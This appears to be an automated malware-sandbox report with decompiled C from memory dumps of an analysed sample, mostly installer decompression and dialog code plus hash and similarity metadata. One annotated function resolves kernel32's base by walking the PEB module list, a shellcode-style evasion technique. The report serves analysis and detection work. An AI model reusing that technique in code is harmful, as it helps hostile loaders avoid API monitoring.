                                                                        				signed int _t187;
                                                                        				signed int* _t189;
                                                                        				signed int _t190;
                                                                        				intOrPtr* _t191;
                                                                        				intOrPtr _t192;
                                                                        				signed int _t193;
                                                                        				signed int _t195;
                                                                        				signed int _t200;
                                                                        				signed int _t205;
                                                                        				void* _t207;
                                                                        				short _t208;
                                                                        				signed char _t222;
                                                                        				signed int _t224;
                                                                        				signed int _t225;
                                                                        				signed int* _t232;
                                                                        				signed int _t233;
                                                                        				signed int _t234;
                                                                        				void* _t235;
                                                                        				signed int _t236;
                                                                        				signed int _t244;
                                                                        				signed int _t246;
                                                                        				signed int _t251;
                                                                        				signed int _t254;
                                                                        				signed int _t256;
                                                                        				signed int _t259;
                                                                        				signed int _t262;
                                                                        				void* _t263;
                                                                        				void* _t264;
                                                                        				signed int _t267;
                                                                        				intOrPtr _t269;
                                                                        				intOrPtr _t271;
                                                                        				signed int _t274;
                                                                        				intOrPtr* _t275;
                                                                        				unsigned int _t276;
                                                                        				void* _t277;
                                                                        				signed int _t278;
                                                                        				intOrPtr* _t279;
                                                                        				signed int _t281;
                                                                        				intOrPtr _t282;
                                                                        				intOrPtr _t283;
                                                                        				signed int* _t284;
                                                                        				signed int _t286;
                                                                        				signed int _t287;
                                                                        				signed int _t288;
                                                                        				signed int _t296;
                                                                        				signed int* _t297;
                                                                        				intOrPtr _t298;
                                                                        				void* _t299;
                                                                        
                                                                        				_t278 = _a8;
                                                                        				_t187 = 0x10;
                                                                        				memset( &_v116, 0, _t187 << 2);
                                                                        				_t189 = _a4;
                                                                        				_t233 = _t278;
                                                                        				do {
                                                                        					_t166 =  *_t189;
                                                                        					_t189 =  &(_t189[1]);
                                                                        					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                                        					_t233 = _t233 - 1;
                                                                        				} while (_t233 != 0);
                                                                        				if(_v116 != _t278) {
                                                                        					_t279 = _a28;
                                                                        					_t267 =  *_t279;
                                                                        					_t190 = 1;
                                                                        					_a28 = _t267;
                                                                        					_t234 = 0xf;
                                                                        					while(1) {
                                                                        						_t168 = 0;
                                                                        						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t190 = _t190 + 1;
                                                                        						if(_t190 <= _t234) {
                                                                        							continue;
                                                                        						}
                                                                        						break;
                                                                        					}
                                                                        					_v8 = _t190;
                                                                        					if(_t267 < _t190) {
                                                                        						_a28 = _t190;
                                                                        					}
                                                                        					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                                        						_t234 = _t234 - 1;
                                                                        						if(_t234 != 0) {
                                                                        							continue;
                                                                        						}
                                                                        						break;
                                                                        					}
                                                                        					_v28 = _t234;
                                                                        					if(_a28 > _t234) {
                                                                        						_a28 = _t234;
                                                                        					}
                                                                        					 *_t279 = _a28;
                                                                        					_t181 = 1 << _t190;
                                                                        					while(_t190 < _t234) {
                                                                        						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                                        						if(_t182 < 0) {
                                                                        							L64:
                                                                        							return _t168 | 0xffffffff;
                                                                        						}
                                                                        						_t190 = _t190 + 1;
                                                                        						_t181 = _t182 + _t182;
                                                                        					}
                                                                        					_t281 = _t234 << 2;
                                                                        					_t191 = _t299 + _t281 - 0x70;
                                                                        					_t269 =  *_t191;
                                                                        					_t183 = _t181 - _t269;
                                                                        					_v52 = _t183;
                                                                        					if(_t183 < 0) {
                                                                        						goto L64;
                                                                        					}
                                                                        					_v176 = _t168;
                                                                        					 *_t191 = _t269 + _t183;
                                                                        					_t192 = 0;
                                                                        					_t235 = _t234 - 1;
                                                                        					if(_t235 == 0) {
                                                                        						L21:
                                                                        						_t184 = _a4;
                                                                        						_t271 = 0;
                                                                        						do {
                                                                        							_t193 =  *_t184;
                                                                        							_t184 =  &(_t184[1]);
                                                                        							if(_t193 != _t168) {
                                                                        								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                                        								_t236 =  *_t232;
                                                                        								 *((intOrPtr*)(0x42d6a8 + _t236 * 4)) = _t271;
                                                                        								 *_t232 = _t236 + 1;
                                                                        							}
                                                                        							_t271 = _t271 + 1;
                                                                        						} while (_t271 < _a8);
                                                                        						_v16 = _v16 | 0xffffffff;
                                                                        						_v40 = _v40 & 0x00000000;
                                                                        						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                                        						_t195 = _v8;
                                                                        						_t186 =  ~_a28;
                                                                        						_v12 = _t168;
                                                                        						_v180 = _t168;
                                                                        						_v36 = 0x42d6a8;
                                                                        						_v240 = _t168;
                                                                        						if(_t195 > _v28) {
                                                                        							L62:
                                                                        							_t168 = 0;
                                                                        							if(_v52 == 0 || _v28 == 1) {
                                                                        								return _t168;
                                                                        							} else {
                                                                        								goto L64;
                                                                        							}
                                                                        						}
                                                                        						_v44 = _t195 - 1;
                                                                        						_v32 = _t299 + _t195 * 4 - 0x70;
                                                                        						do {
                                                                        							_t282 =  *_v32;
                                                                        							if(_t282 == 0) {
                                                                        								goto L61;
                                                                        							}
                                                                        							while(1) {
                                                                        								_t283 = _t282 - 1;
                                                                        								_t200 = _a28 + _t186;
                                                                        								_v48 = _t283;
                                                                        								_v24 = _t200;
                                                                        								if(_v8 <= _t200) {
                                                                        									goto L45;
                                                                        								}
                                                                        								L31:
                                                                        								_v20 = _t283 + 1;
                                                                        								do {
                                                                        									_v16 = _v16 + 1;
                                                                        									_t296 = _v28 - _v24;
                                                                        									if(_t296 > _a28) {
                                                                        										_t296 = _a28;
                                                                        									}
                                                                        									_t222 = _v8 - _v24;
                                                                        									_t254 = 1 << _t222;
                                                                        									if(1 <= _v20) {
                                                                        										L40:
                                                                        										_t256 =  *_a36;
                                                                        										_t168 = 1 << _t222;
                                                                        										_v40 = 1;
                                                                        										_t274 = _t256 + 1;
                                                                        										if(_t274 > 0x5a0) {
                                                                        											goto L64;
                                                                        										}
                                                                        									} else {
                                                                        										_t275 = _v32;
                                                                        										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                                        										if(_t222 >= _t296) {
                                                                        											goto L40;
                                                                        										}
                                                                        										while(1) {
                                                                        											_t222 = _t222 + 1;
                                                                        											if(_t222 >= _t296) {
                                                                        												goto L40;
                                                                        											}
                                                                        											_t275 = _t275 + 4;
                                                                        											_t264 = _t263 + _t263;
                                                                        											_t175 =  *_t275;
                                                                        											if(_t264 <= _t175) {
                                                                        												goto L40;
                                                                        											}
                                                                        											_t263 = _t264 - _t175;
                                                                        										}
                                                                        										goto L40;
                                                                        									}
                                                                        									_t168 = _a32 + _t256 * 4;
                                                                        									_t297 = _t299 + _v16 * 4 - 0xec;
                                                                        									 *_a36 = _t274;
                                                                        									_t259 = _v16;
                                                                        									 *_t297 = _t168;
                                                                        									if(_t259 == 0) {
                                                                        										 *_a24 = _t168;
                                                                        									} else {
                                                                        										_t276 = _v12;
                                                                        										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                                        										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                                        										_a5 = _a28;
                                                                        										_a4 = _t222;
                                                                        										_t262 = _t276 >> _t186;
                                                                        										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                                        										 *(_t298 + _t262 * 4) = _a4;
                                                                        									}
                                                                        									_t224 = _v24;
                                                                        									_t186 = _t224;
                                                                        									_t225 = _t224 + _a28;
                                                                        									_v24 = _t225;
                                                                        								} while (_v8 > _t225);
                                                                        								L45:
                                                                        								_t284 = _v36;
                                                                        								_a5 = _v8 - _t186;
                                                                        								if(_t284 < 0x42d6a8 + _a8 * 4) {
                                                                        									_t205 =  *_t284;
                                                                        									if(_t205 >= _a12) {
                                                                        										_t207 = _t205 - _a12 + _t205 - _a12;
                                                                        										_v36 =  &(_v36[1]);
                                                                        										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                                        										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                                        									} else {
                                                                        										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                                        										_t208 =  *_t284;
                                                                        										_v36 =  &(_t284[1]);
                                                                        									}
                                                                        									_a6 = _t208;
                                                                        								} else {
                                                                        									_a4 = 0xc0;
                                                                        								}
                                                                        								_t286 = 1 << _v8 - _t186;
                                                                        								_t244 = _v12 >> _t186;
                                                                        								while(_t244 < _v40) {
                                                                        									 *(_t168 + _t244 * 4) = _a4;
                                                                        									_t244 = _t244 + _t286;
                                                                        								}
                                                                        								_t287 = _v12;
                                                                        								_t246 = 1 << _v44;
                                                                        								while((_t287 & _t246) != 0) {
                                                                        									_t287 = _t287 ^ _t246;
                                                                        									_t246 = _t246 >> 1;
                                                                        								}
                                                                        								_t288 = _t287 ^ _t246;
                                                                        								_v20 = 1;
                                                                        								_v12 = _t288;
                                                                        								_t251 = _v16;
                                                                        								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                                        									L60:
                                                                        									if(_v48 != 0) {
                                                                        										_t282 = _v48;
                                                                        										_t283 = _t282 - 1;
                                                                        										_t200 = _a28 + _t186;
                                                                        										_v48 = _t283;
                                                                        										_v24 = _t200;
                                                                        										if(_v8 <= _t200) {
                                                                        											goto L45;
                                                                        										}
                                                                        										goto L31;
                                                                        									}
                                                                        									break;
                                                                        								} else {
                                                                        									goto L58;
                                                                        								}
                                                                        								do {
                                                                        									L58:
                                                                        									_t186 = _t186 - _a28;
                                                                        									_t251 = _t251 - 1;
                                                                        								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                                        								_v16 = _t251;
                                                                        								goto L60;
                                                                        							}
                                                                        							L61:
                                                                        							_v8 = _v8 + 1;
                                                                        							_v32 = _v32 + 4;
                                                                        							_v44 = _v44 + 1;
                                                                        						} while (_v8 <= _v28);
                                                                        						goto L62;
                                                                        					}
                                                                        					_t277 = 0;
                                                                        					do {
                                                                        						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                                        						_t277 = _t277 + 4;
                                                                        						_t235 = _t235 - 1;
                                                                        						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                                        					} while (_t235 != 0);
                                                                        					goto L21;
                                                                        				}
                                                                        				 *_a24 =  *_a24 & 0x00000000;
                                                                        				 *_a28 =  *_a28 & 0x00000000;
                                                                        				return 0;
                                                                        			}
                                                                        0x00407222
                                                                        0x00407226
                                                                        0x00407229
                                                                        0x0040722c
                                                                        0x00407231
                                                                        0x00407234
                                                                        0x0040723a
                                                                        0x00407241
                                                                        0x00407247
                                                                        0x00407440
                                                                        0x00407440
                                                                        0x00407445
                                                                        0x00407454
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407445
                                                                        0x00407254
                                                                        0x00407257
                                                                        0x0040725a
                                                                        0x0040725d
                                                                        0x00407261
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040726c
                                                                        0x0040726f
                                                                        0x00407270
                                                                        0x00407272
                                                                        0x00407278
                                                                        0x0040727b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407281
                                                                        0x00407282
                                                                        0x00407285
                                                                        0x00407288
                                                                        0x0040728b
                                                                        0x00407291
                                                                        0x00407293
                                                                        0x00407293
                                                                        0x0040729b
                                                                        0x0040729f
                                                                        0x004072a4
                                                                        0x004072c9
                                                                        0x004072cf
                                                                        0x004072d1
                                                                        0x004072d3
                                                                        0x004072d6
                                                                        0x004072df
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004072a6
                                                                        0x004072a6
                                                                        0x004072af
                                                                        0x004072b3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004072c4
                                                                        0x004072c4
                                                                        0x004072c7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004072b7
                                                                        0x004072ba
                                                                        0x004072bc
                                                                        0x004072c0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004072c2
                                                                        0x004072c2
                                                                        0x00000000
                                                                        0x004072c4
                                                                        0x004072e8
                                                                        0x004072ee
                                                                        0x004072f8
                                                                        0x004072fa
                                                                        0x004072ff
                                                                        0x00407301
                                                                        0x00407337
                                                                        0x00407303
                                                                        0x00407303
                                                                        0x00407306
                                                                        0x00407309
                                                                        0x00407313
                                                                        0x00407316
                                                                        0x0040731d
                                                                        0x00407328
                                                                        0x0040732f
                                                                        0x0040732f
                                                                        0x00407339
                                                                        0x0040733c
                                                                        0x0040733e
                                                                        0x00407344
                                                                        0x00407344
                                                                        0x0040734d
                                                                        0x00407350
                                                                        0x00407355
                                                                        0x00407364
                                                                        0x0040736c
                                                                        0x00407371
                                                                        0x00407395
                                                                        0x0040739d
                                                                        0x004073a1
                                                                        0x004073a7
                                                                        0x00407373
                                                                        0x00407381
                                                                        0x00407384
                                                                        0x0040738a
                                                                        0x0040738a
                                                                        0x004073ab
                                                                        0x00407366
                                                                        0x00407366
                                                                        0x00407366
                                                                        0x004073bc
                                                                        0x004073c0
                                                                        0x004073cc
                                                                        0x004073c7
                                                                        0x004073ca
                                                                        0x004073ca
                                                                        0x004073d4
                                                                        0x004073d9
                                                                        0x004073e1
                                                                        0x004073dd
                                                                        0x004073df
                                                                        0x004073df
                                                                        0x004073e7
                                                                        0x004073e9
                                                                        0x004073f0
                                                                        0x004073fa
                                                                        0x00407404
                                                                        0x00407420
                                                                        0x00407424
                                                                        0x00407269
                                                                        0x0040726f
                                                                        0x00407270
                                                                        0x00407272
                                                                        0x00407278
                                                                        0x0040727b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040727b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407406
                                                                        0x00407406
                                                                        0x00407406
                                                                        0x0040740b
                                                                        0x00407414
                                                                        0x0040741d
                                                                        0x00000000
                                                                        0x0040741d
                                                                        0x0040742a
                                                                        0x0040742a
                                                                        0x0040742d
                                                                        0x00407434
                                                                        0x00407437
                                                                        0x00000000
                                                                        0x0040725a
                                                                        0x004071da
                                                                        0x004071dc
                                                                        0x004071dc
                                                                        0x004071e0
                                                                        0x004071e3
                                                                        0x004071e4
                                                                        0x004071e4
                                                                        0x00000000
                                                                        0x004071dc
                                                                        0x00407150
                                                                        0x00407156
                                                                        0x00000000

Memory Dump Source
• Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
• Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
• Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
• Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
• Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.240323672.00000000024D0000.00000040.00000001.sdmp, Offset: 024D0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
• Instruction ID: 733346b83b067c984604e844ffda2d3c3ecb74119856878fba039417c92b6d8f
• Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
• Instruction Fuzzy Hash: F9010C79A11208EFCB51DF99C59099DBBF5EB08220F118596ED58E7721D330AE50DB40
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E10001000() {
				// Decompiler output, annotated: fs:[0x30] is the PEB. PEB+0xc is Ldr, and
				// Ldr+0xc is InLoadOrderModuleList.Flink (the first LDR_DATA_TABLE_ENTRY).
				// Two further dereferences step along the list to the third entry, and +0x18
				// reads that entry's DllBase. On 32-bit Windows the third module in load order
				// is typically kernel32.dll, so this resolves its base address without an API call.
				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}


Memory Dump Source
• Source File: 00000000.00000002.240764682.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.240760281.0000000010000000.00000002.00020000.sdmp
• Associated: 00000000.00000002.240769821.0000000010002000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
• Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
• Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
• Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.240323672.00000000024D0000.00000040.00000001.sdmp, Offset: 024D0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
• Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
• Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
• Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
Uniqueness

Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 96%
                                                                        			E00404B80(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                        				struct HWND__* _v8;
                                                                        				struct HWND__* _v12;
                                                                        				long _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				intOrPtr _v28;
                                                                        				signed char* _v32;
                                                                        				int _v36;
                                                                        				signed int _v44;
                                                                        				int _v48;
                                                                        				signed int* _v60;
                                                                        				signed char* _v64;
                                                                        				signed int _v68;
                                                                        				long _v72;
                                                                        				void* _v76;
                                                                        				intOrPtr _v80;
                                                                        				intOrPtr _v84;
                                                                        				void* _v88;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t203;
                                                                        				intOrPtr _t206;
                                                                        				intOrPtr _t207;
                                                                        				long _t212;
                                                                        				signed int _t216;
                                                                        				signed int _t227;
                                                                        				void* _t230;
                                                                        				void* _t231;
                                                                        				int _t237;
                                                                        				long _t242;
                                                                        				long _t243;
                                                                        				signed int _t244;
                                                                        				signed int _t250;
                                                                        				signed int _t252;
                                                                        				signed char _t253;
                                                                        				signed char _t259;
                                                                        				void* _t264;
                                                                        				void* _t266;
                                                                        				signed char* _t284;
                                                                        				signed char _t285;
                                                                        				long _t290;
                                                                        				signed int _t300;
                                                                        				signed int _t308;
                                                                        				signed char* _t316;
                                                                        				int _t320;
                                                                        				int _t321;
                                                                        				signed int* _t322;
                                                                        				int _t323;
                                                                        				long _t324;
                                                                        				signed int _t325;
                                                                        				long _t327;
                                                                        				int _t328;
                                                                        				signed int _t329;
                                                                        				void* _t331;
                                                                        
                                                                        				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                        				_v8 = GetDlgItem(_a4, 0x408);
                                                                        				_t331 = SendMessageA;
                                                                        				_v24 =  *0x42f468;
                                                                        				_v28 =  *0x42f434 + 0x94;
                                                                        				_t320 = 0x10;
                                                                        				if(_a8 != 0x110) {
                                                                        					L23:
                                                                        					if(_a8 != 0x405) {
                                                                        						_t298 = _a16;
                                                                        					} else {
                                                                        						_a12 = 0;
                                                                        						_t298 = 1;
                                                                        						_a8 = 0x40f;
                                                                        						_a16 = 1;
                                                                        					}
                                                                        					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                        						_v16 = _t298;
                                                                        						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
                                                                        							if(( *0x42f43d & 0x00000002) != 0) {
                                                                        								L41:
                                                                        								if(_v16 != 0) {
                                                                        									_t242 = _v16;
                                                                        									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
                                                                        										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
                                                                        									}
                                                                        									_t243 = _v16;
                                                                        									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
                                                                        										_t298 = _v24;
                                                                        										_t244 =  *(_t243 + 0x5c);
                                                                        										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
                                                                        											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
                                                                        										} else {
                                                                        											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								goto L48;
                                                                        							}
                                                                        							if(_a8 == 0x413) {
                                                                        								L33:
                                                                        								_t298 = 0 | _a8 != 0x00000413;
                                                                        								_t250 = E00404ACE(_v8, _a8 != 0x413);
                                                                        								_t325 = _t250;
                                                                        								if(_t325 >= 0) {
                                                                        									_t99 = _v24 + 8; // 0x8
                                                                        									_t298 = _t250 * 0x418 + _t99;
                                                                        									_t252 =  *_t298;
                                                                        									if((_t252 & 0x00000010) == 0) {
                                                                        										if((_t252 & 0x00000040) == 0) {
                                                                        											_t253 = _t252 ^ 0x00000001;
                                                                        										} else {
                                                                        											_t259 = _t252 ^ 0x00000080;
                                                                        											if(_t259 >= 0) {
                                                                        												_t253 = _t259 & 0x000000fe;
                                                                        											} else {
                                                                        												_t253 = _t259 | 0x00000001;
                                                                        											}
                                                                        										}
                                                                        										 *_t298 = _t253;
                                                                        										E0040117D(_t325);
                                                                        										_a12 = _t325 + 1;
                                                                        										_a16 =  !( *0x42f43c) >> 0x00000008 & 0x00000001;
                                                                        										_a8 = 0x40f;
                                                                        									}
                                                                        								}
                                                                        								goto L41;
                                                                        							}
                                                                        							_t298 = _a16;
                                                                        							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                        								goto L41;
                                                                        							}
                                                                        							goto L33;
                                                                        						} else {
                                                                        							goto L48;
                                                                        						}
                                                                        					} else {
                                                                        						L48:
                                                                        						if(_a8 != 0x111) {
                                                                        							L56:
                                                                        							if(_a8 == 0x200) {
                                                                        								SendMessageA(_v8, 0x200, 0, 0);
                                                                        							}
                                                                        							if(_a8 == 0x40b) {
                                                                        								_t230 =  *0x42a874;
                                                                        								if(_t230 != 0) {
                                                                        									ImageList_Destroy(_t230);
                                                                        								}
                                                                        								_t231 =  *0x42a888;
                                                                        								if(_t231 != 0) {
                                                                        									GlobalFree(_t231);
                                                                        								}
                                                                        								 *0x42a874 = 0;
                                                                        								 *0x42a888 = 0;
                                                                        								 *0x42f4a0 = 0;
                                                                        							}
                                                                        							if(_a8 != 0x40f) {
                                                                        								L90:
                                                                        								if(_a8 == 0x420 && ( *0x42f43d & 0x00000001) != 0) {
                                                                        									_t321 = (0 | _a16 == 0x00000020) << 3;
                                                                        									ShowWindow(_v8, _t321);
                                                                        									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
                                                                        								}
                                                                        								goto L93;
                                                                        							} else {
                                                                        								E004011EF(_t298, 0, 0);
                                                                        								_t203 = _a12;
                                                                        								if(_t203 != 0) {
                                                                        									if(_t203 != 0xffffffff) {
                                                                        										_t203 = _t203 - 1;
                                                                        									}
                                                                        									_push(_t203);
                                                                        									_push(8);
                                                                        									E00404B4E();
                                                                        								}
                                                                        								if(_a16 == 0) {
                                                                        									L75:
                                                                        									E004011EF(_t298, 0, 0);
                                                                        									_v36 =  *0x42a888;
                                                                        									_t206 =  *0x42f468;
                                                                        									_v64 = 0xf030;
                                                                        									_v24 = 0;
                                                                        									if( *0x42f46c <= 0) {
                                                                        										L86:
                                                                        										if( *0x42f42c == 4) {
                                                                        											InvalidateRect(_v8, 0, 1);
                                                                        										}
                                                                        										_t207 =  *0x42ebfc; // 0x7c930d
                                                                        										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
                                                                        											E00404A89(0x3ff, 0xfffffffb, E00404AA1(5));
                                                                        										}
                                                                        										goto L90;
                                                                        									}
                                                                        									_t322 = _t206 + 8;
                                                                        									do {
                                                                        										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                                        										if(_t212 != 0) {
                                                                        											_t300 =  *_t322;
                                                                        											_v72 = _t212;
                                                                        											_v76 = 8;
                                                                        											if((_t300 & 0x00000001) != 0) {
                                                                        												_v76 = 9;
                                                                        												_v60 =  &(_t322[4]);
                                                                        												_t322[0] = _t322[0] & 0x000000fe;
                                                                        											}
                                                                        											if((_t300 & 0x00000040) == 0) {
                                                                        												_t216 = (_t300 & 0x00000001) + 1;
                                                                        												if((_t300 & 0x00000010) != 0) {
                                                                        													_t216 = _t216 + 3;
                                                                        												}
                                                                        											} else {
                                                                        												_t216 = 3;
                                                                        											}
                                                                        											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
                                                                        											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                        											SendMessageA(_v8, 0x110d, 0,  &_v76);
                                                                        										}
                                                                        										_v24 = _v24 + 1;
                                                                        										_t322 =  &(_t322[0x106]);
                                                                        									} while (_v24 <  *0x42f46c);
                                                                        									goto L86;
                                                                        								} else {
                                                                        									_t323 = E004012E2( *0x42a888);
                                                                        									E00401299(_t323);
                                                                        									_t227 = 0;
                                                                        									_t298 = 0;
                                                                        									if(_t323 <= 0) {
                                                                        										L74:
                                                                        										SendMessageA(_v12, 0x14e, _t298, 0);
                                                                        										_a16 = _t323;
                                                                        										_a8 = 0x420;
                                                                        										goto L75;
                                                                        									} else {
                                                                        										goto L71;
                                                                        									}
                                                                        									do {
                                                                        										L71:
                                                                        										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
                                                                        											_t298 = _t298 + 1;
                                                                        										}
                                                                        										_t227 = _t227 + 1;
                                                                        									} while (_t227 < _t323);
                                                                        									goto L74;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                        							goto L93;
                                                                        						} else {
                                                                        							_t237 = SendMessageA(_v12, 0x147, 0, 0);
                                                                        							if(_t237 == 0xffffffff) {
                                                                        								goto L93;
                                                                        							}
                                                                        							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
                                                                        							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
                                                                        								_t324 = 0x20;
                                                                        							}
                                                                        							E00401299(_t324);
                                                                        							SendMessageA(_a4, 0x420, 0, _t324);
                                                                        							_a12 = _a12 | 0xffffffff;
                                                                        							_a16 = 0;
                                                                        							_a8 = 0x40f;
                                                                        							goto L56;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					_v36 = 0;
                                                                        					 *0x42f4a0 = _a4;
                                                                        					_v20 = 2;
                                                                        					 *0x42a888 = GlobalAlloc(0x40,  *0x42f46c << 2);
                                                                        					_t264 = LoadImageA( *0x42f420, 0x6e, 0, 0, 0, 0);
                                                                        					 *0x42a87c =  *0x42a87c | 0xffffffff;
                                                                        					_v16 = _t264;
                                                                        					 *0x42a884 = SetWindowLongA(_v8, 0xfffffffc, E00405192);
                                                                        					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
                                                                        					 *0x42a874 = _t266;
                                                                        					ImageList_AddMasked(_t266, _v16, 0xff00ff);
                                                                        					SendMessageA(_v8, 0x1109, 2,  *0x42a874);
                                                                        					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
                                                                        						SendMessageA(_v8, 0x111b, _t320, 0);
                                                                        					}
                                                                        					DeleteObject(_v16);
                                                                        					_t327 = 0;
                                                                        					do {
                                                                        						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
                                                                        						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
                                                                        							if(_t327 != 0x20) {
                                                                        								_v20 = 0;
                                                                        							}
                                                                        							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E0040618A(0, _t327, _t331, 0, _t272)), _t327);
                                                                        						}
                                                                        						_t327 = _t327 + 1;
                                                                        					} while (_t327 < 0x21);
                                                                        					_t328 = _a16;
                                                                        					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
                                                                        					_push(0x15);
                                                                        					E0040417B(_a4);
                                                                        					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
                                                                        					_push(0x16);
                                                                        					E0040417B(_a4);
                                                                        					_t329 = 0;
                                                                        					_v16 = 0;
